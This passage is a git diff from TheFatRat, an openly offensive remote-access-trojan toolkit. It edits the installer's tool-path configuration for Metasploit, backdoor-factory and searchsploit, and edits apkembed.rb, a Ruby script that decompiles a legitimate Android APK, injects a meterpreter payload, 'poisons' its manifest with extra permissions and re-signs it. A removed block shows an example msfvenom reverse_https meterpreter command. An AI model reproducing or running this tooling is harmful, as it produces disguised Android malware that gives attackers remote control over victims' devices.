reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config +echo "********************************************************************************************************" >> $config +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 sleep 2 else echo "" -echo "[ X ] metasploit-framework -> not found ]" +echo "[ X ] metasploit-framework -> not found " # Providing manual input to user in case metasploit was installed from git and is not on system path echo "" @@ -237,39 +370,39 @@ read -p "Press Y/y to config metasploit-framework path or N/n to install it from case "$choice" in y|Y) -rm -f config.path -touch config.path -echo "********************************************************************************************************" >> config.path -echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path -echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path -echo "********************************************************************************************************" >> config.path +rm -f $config +touch $config +echo "********************************************************************************************************" >> $config +echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config +echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config +echo "********************************************************************************************************" >> $config clear -echo "Enter the path of your Metasploit Instalation or just press enter for default config ." -echo -e $white "Ex:(/opt/metasploit-framework)"; -read -p "Path:" msfc +echo -e $white "Enter the path of your Metasploit Instalation or just press enter for default config : +ex:(/opt/metasploit-framework)"; +read -p "Path: " msfc if [[ -z "$msfc" ]]; then -echo "msfconsole" >> config.path -echo "msfvenom" >> config.path +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 else -echo "ruby $msfc/msfconsole" >> config.path -echo "ruby $msfc/msfvenom" >> config.path +echo "ruby $msfc/msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "ruby $msfc/msfvenom" | tee -a $config $log > /dev/null 2>&1 fi ;; n|N) -echo "[ ! ] Installing metasploit-framework from kali repositories ]" +echo "[ ! ] Installing metasploit-framework from kali repositories " xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" echo "[ ✔ ] Done installing ...." -rm -f config.path -touch config.path -echo "********************************************************************************************************" >> config.path -echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path -echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path -echo "********************************************************************************************************" >> config.path +rm -f $config +touch $config +echo "********************************************************************************************************" >> $config +echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config +echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config +echo "********************************************************************************************************" >> $config # adding the msf startups automatically to config file -echo "msfconsole" >> config.path -echo "msfvenom" >> config.path +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 ;; *) @@ -282,25 +415,24 @@ fi which backdoor-factory > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Backdoor-Factory..................[ found ]" -echo "backdoor-factory" >> config.path +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 sleep 2 else -echo "[ X ] backdoor-factory -> not found ]" +echo "[ X ] backdoor-factory -> not found " echo "" -echo -e $white "[This script requires backdoor-factory - , do you want to setup its path manually ?]"; +echo -e $white "[This script requires backdoor-factory , do you want to setup its path manually ?]"; read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1 case "$choice1" in y|Y ) clear -echo -e $white "Enter the path for backdoor.py ex:(/opt/backdoor-factory/backdoor.py) -, or just press [ENTER] for default config : "; -read -p "Path:" backdoor +echo -e $white "Enter the path for backdoor.py , or just press [ENTER] for default config : +ex:(/opt/backdoor-factory/backdoor.py)"; +read -p "Path: " backdoor if [[ -z "$backdoor" ]]; then -echo "backdoor-factory" >> config.path +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 else -echo "python2 $backdoor" >> config.path +echo "python2 $backdoor" | tee -a $config $log > /dev/null 2>&1 fi ;; @@ -308,7 +440,7 @@ fi echo "[ ! ] Installing backdoor-factory from kali repositories ]" xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" echo "[ ✔ ] Done installing ...." -echo "backdoor-factory" >> config.path +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 ;; *) @@ -316,13 +448,12 @@ echo "Invalid Input (Choose y/Y or n/N only)" ;; esac; fi -sleep 2 # check if searchsploit exists which searchsploit > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Searchsploit......................[ found ]" -echo "searchsploit" >> config.path +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 sleep 2 else echo "[ X ] searchsploit -> not found]" @@ -333,13 +464,13 @@ case "$choice2" in y|Y ) clear -echo -e $yellow "Enter the path for searchsploit ex:(/opt/searchsploit/searchsploit) -, or just press [ENTER] for default config : " +echo -e $white "Enter the path for searchsploit , or just press [ENTER] for default config : +ex:(/opt/searchsploit/searchsploit) " read -p "Path: " searchsploit if [[ -z "$searchsploit" ]]; then -echo "searchsploit" >> config.path +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 else -echo "bash $searchsploit" >> config.path +echo "bash $searchsploit" | tee -a $config $log > /dev/null 2>&1 fi ;; @@ -347,7 +478,7 @@ n|N ) echo "[ ! ] Installing searchsploit from kali repositories ]" xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" echo "[ ✔ ] Done installing ...." -echo "searchsploit" >> config.path +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 sleep 2 echo "" echo "Configuration and tool installed with success!"; @@ -383,7 +514,7 @@ rm -f /usr/local/sbin/fatrat touch /usr/local/sbin/fatrat echo "#!/bin/bash" > /usr/local/sbin/fatrat echo $scrp >> /usr/local/sbin/fatrat -chmod +x /usr/local/sbin/fatrat +chmod +x /usr/local/sbin/fatrat clear echo ""; echo "[ ]====================================================================[ ]"; @@ -391,6 +522,7 @@ echo ""; echo "[ ]====================================================================[ ]"; echo ""; chmod +x fatrat + which fatrat >> $log 2>&1 sleep 2 ;; diff --git a/tools/apkembed.rb b/tools/apkembed.rb index f69454f..92c8ba1 100644 --- a/tools/apkembed.rb +++ b/tools/apkembed.rb @@ -89,8 +89,8 @@ def fix_manifest() } original_permissions=[] apk_mani='' - - #Load original apk's permissions + + #Load original apk's permissions File.open("output/original/AndroidManifest.xml","r"){|file2| k=File.read(file2) apk_mani=k @@ -152,29 +152,6 @@ unless(apk_v.split()[1].include?("v2.")) exit(1) end -begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } -rescue - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" - puts "[-] Error parsing msfvenom options. Exiting.\n" - exit(1) -end - - - -print "[*] Generating msfvenom payload..\n" -res=`msfvenom -f raw #{opts} -o output/payload.apk ` -if res.downcase.include?("invalid" || "error") - puts res - exit(1) -end - print "[*] Signing payload..\n" `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey` @@ -183,7 +160,7 @@ print "[*] Signing payload..\n" `cp #{apkfile} output/original.apk` -print "[*] Decompiling orignal APK..\n" +print "[*] Decompiling original APK..\n" `apktool d output/original.apk -o output/original` print "[*] Decompiling payload APK..\n" `apktool d output/payload.apk -o output/payload` @@ -226,7 +203,7 @@ print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest() print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -`apktool b -o output/#{injected_apk} output/original` +`apktool b -o #{injected_apk} output/original` print "[*] Signing #{injected_apk} ..\n" `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`